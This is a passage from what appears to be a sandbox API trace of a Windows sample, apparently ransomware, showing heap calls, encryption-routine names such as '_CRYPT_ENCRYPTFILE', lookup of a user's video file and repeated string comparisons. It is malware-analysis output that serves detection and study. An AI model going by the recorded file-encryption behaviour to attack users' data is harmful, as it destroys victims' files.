returned 1 [0197.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0197.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0197.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0197.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0197.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0197.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0197.172] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0197.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0197.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0197.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0197.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0197.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0197.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0197.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0197.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0197.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0197.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0197.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0197.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0197.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0197.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0197.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.172] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0197.172] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0197.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0197.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0197.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0197.173] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0197.173] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0197.173] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.173] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0197.173] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0197.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0197.173] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.173] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.173] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.173] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7058bcd0, ftCreationTime.dwHighDateTime=0x1d5e3e4, ftLastAccessTime.dwLowDateTime=0xd897bd50, ftLastAccessTime.dwHighDateTime=0x1d5db74, ftLastWriteTime.dwLowDateTime=0xd897bd50, ftLastWriteTime.dwHighDateTime=0x1d5db74, nFileSizeHigh=0x0, nFileSizeLow=0xe1da, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="9e BCelV9odP5IiT.avi", cAlternateFileName="9EBCEL~1.AVI")) returned 0x90add8 [0197.173] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0197.174] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.174] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7058bcd0, ftCreationTime.dwHighDateTime=0x1d5e3e4, ftLastAccessTime.dwLowDateTime=0xd897bd50, ftLastAccessTime.dwHighDateTime=0x1d5db74, ftLastWriteTime.dwLowDateTime=0xd897bd50, ftLastWriteTime.dwHighDateTime=0x1d5db74, nFileSizeHigh=0x0, nFileSizeLow=0xe1da, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="9e BCelV9odP5IiT.avi", cAlternateFileName="9EBCEL~1.AVI")) returned 0x90add8 [0197.174] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0197.174] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mgGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gGtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GtzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tzCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zCZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CZzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zzg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zg\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BCelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CelV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="elV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lV9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dP5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P5IiT.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.177] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.177] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0197.177] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0197.177] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0197.177] PeekMessageW (in: 